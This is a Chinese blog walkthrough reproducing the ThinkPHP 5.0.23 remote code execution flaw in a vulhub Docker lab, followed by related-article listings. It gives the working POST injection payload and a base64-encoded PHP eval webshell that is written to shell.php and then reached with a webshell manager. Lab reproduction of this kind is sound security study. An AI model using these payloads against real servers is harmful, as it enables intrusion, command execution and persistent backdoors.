ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)

已于 2023-06-20 11:13:52 修改
阅读量2.8k 收藏 15
点赞数 2
分类专栏: 中间件漏洞 文章标签: 安全 web安全
于 2023-03-17 08:40:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52701599/article/details/129610760
版权

目录

漏洞介绍

漏洞复现

1.环境搭建

2.漏洞利用

漏洞介绍

5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞复现

1.环境搭建

使用docker容器搭建漏洞环境,进入漏洞文件所在。

cd vulhub/thinkphp/5.0.23-rce

(每个人安装路径不同,我这里是安装在vulhub文件内,选择自己的安装路径)

启动环境

docker-compose up -d

 等待漏洞环境启动完成后,访问your-id:8080就可以看到thinkphp的默认页面了

2.漏洞利用

Poc 路径:/index.php?s=captcha

访问your-id:8080/index.php?s=captcha页面会出现报错。

接下来我们进行POST传参,这里使用的工具是hackbar

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

命令被执行

 接下来我们就可以上传shell文件了,但是无法直接上传shell文件,我们需要对shell文件进行Base 64编码

YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi

发送POST请求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

访问shell.php文件上传成功

 使用WebShell管理工具连接,输入上传的木马所在位置、密码以及选择Base64编码

查看网站目录,复现完成。

六十亿少女的梦
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp5.0.23漏洞复现以及脚本编写
最新发布
weixin_45653478的博客
04-26 788
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
Thinkphp框架漏洞--->5,2024年最新网络安全进阶
2401_83947105的博客
04-14 936
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2370
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行
p36273的博客
09-16 1285
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1817
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5系列远程代码执行漏洞复现详细
weixin_53730939的博客
03-20 7695
ThinkPHP5系列远程代码执行漏洞复现详细
TP 5.0.24反序列化漏洞分析
goddemon
10-20 5727
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Thinkphp框架漏洞--->5.0.23 RCE
huohaowen的博客
03-01 1368
本篇文章来讲一下thinkphp的框架漏洞
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3684
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 6732
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
Thinkphp5.0.23远程代码执行漏洞
hovcfuti的博客
10-13 286
漏洞简介Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响版本漏洞复现在vulhub里面拉取靶场访问可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好请求文件:/index.php?
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 713
vulhub thinkphp5 5.0.23 远程代码执行漏洞
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 950
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
thinkphp5.0.23rce漏洞复现
09-22
漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值